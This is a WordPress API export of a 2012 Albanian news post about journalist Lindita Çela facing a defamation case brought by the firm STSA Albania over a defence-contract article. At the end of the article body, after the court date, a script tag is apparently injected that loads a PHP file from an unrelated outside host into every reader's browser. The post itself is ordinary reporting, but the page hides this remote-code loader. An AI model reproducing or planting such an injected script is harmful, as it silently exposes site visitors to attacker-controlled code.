{"id":494,"date":"2012-10-01T11:56:26","date_gmt":"2012-10-01T09:56:26","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=494"},"modified":"2013-09-30T11:57:46","modified_gmt":"2013-09-30T09:57:46","slug":"lindita-cela-perseri-ne-gjykate","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=494","title":{"rendered":"Lindita \u00c7ela p\u00ebrs\u00ebri n\u00eb gjykat\u00eb"},"content":{"rendered":"<p>P\u00ebrs\u00ebri Lindita \u00c7ela n\u00eb gjykat\u00ebn e Tiran\u00ebs dhe p\u00ebrs\u00ebri n\u00eb at\u00eb penale. K\u00ebt\u00eb her\u00eb \u00ebsht\u00eb firma STSA Albania Shpk q\u00eb e akuzon gazetaren e gazet\u00ebs Shekulli p\u00ebr shpifje.<\/p>\n<p>Pala e d\u00ebmtuar q\u00eb n\u00eb aktivitetin e saj ka si objekt import eksportin e p\u00ebrgjuesve dhe q\u00eb ka pasur nj\u00eb kontrat\u00eb me ministrin\u00eb e mbrojtjes, i \u00ebsht\u00eb drejtuar Gjykat\u00ebs me pretendimin se shkrimi i botuar n\u00eb gazet\u00ebn Shekulli ka pasur q\u00ebllim shmangien e k\u00ebsaj firme nga tregu ku ajo operon. \u00a0Ajo pretendon se shprehjet e p\u00ebrdorura n\u00eb artikull kan\u00eb krijuar klim\u00ebn e mosbesimit n\u00eb publik dhe se faktet nuk bazohen n\u00eb element\u00eb v\u00ebrtet\u00ebsie. Pala e d\u00ebmtuar pretendon gjithashtu se pjesa e shkrimit ku p\u00ebrcaktohet se firma STSA, megjith\u00ebse ishte e regjistruar n\u00eb 6 muajt e fundit arriti t\u00eb p\u00ebrfitonte n\u00eb mas\u00ebn e 88 mij\u00eb dollar\u00ebve kontrat\u00eb, nuk \u00ebsht\u00eb i sakt\u00eb si afirmim. Administratori sakt\u00ebsoi se ai kishte patur kontakt m\u00eb t\u00eb hersh\u00ebm se vet\u00eb regjistrimi i firm\u00ebs STSA, \u00a0me ministrin Imami, p\u00ebr ket\u00eb kontrat\u00eb. P\u00ebr k\u00ebt\u00eb ai u angazhua q\u00eb t\u00eb sjelli fakte bind\u00ebse p\u00ebr Gjykat\u00ebn. Logjika e p\u00ebrdorur nga padit\u00ebsi n\u00eb padi nuk \u00ebsht\u00eb bind\u00ebse, duke qene se komunikimi me ministrin Imami nuk ndryshon faktin se firma STSA ishte pa aktivitet n\u00eb muajt p\u00ebrpara k\u00ebsaj kontrate. Seanca tjet\u00ebr \u00ebsht\u00eb vendosur p\u00ebr dat\u00ebn 30 tetor 2012, ora 9 e 30.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>P\u00ebrs\u00ebri Lindita \u00c7ela n\u00eb gjykat\u00ebn e Tiran\u00ebs dhe p\u00ebrs\u00ebri n\u00eb at\u00eb penale. K\u00ebt\u00eb her\u00eb \u00ebsht\u00eb firma STSA Albania Shpk q\u00eb [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":495,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/494"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=494"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/494\/revisions"}],"predecessor-version":[{"id":496,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/494\/revisions\/496"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/495"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}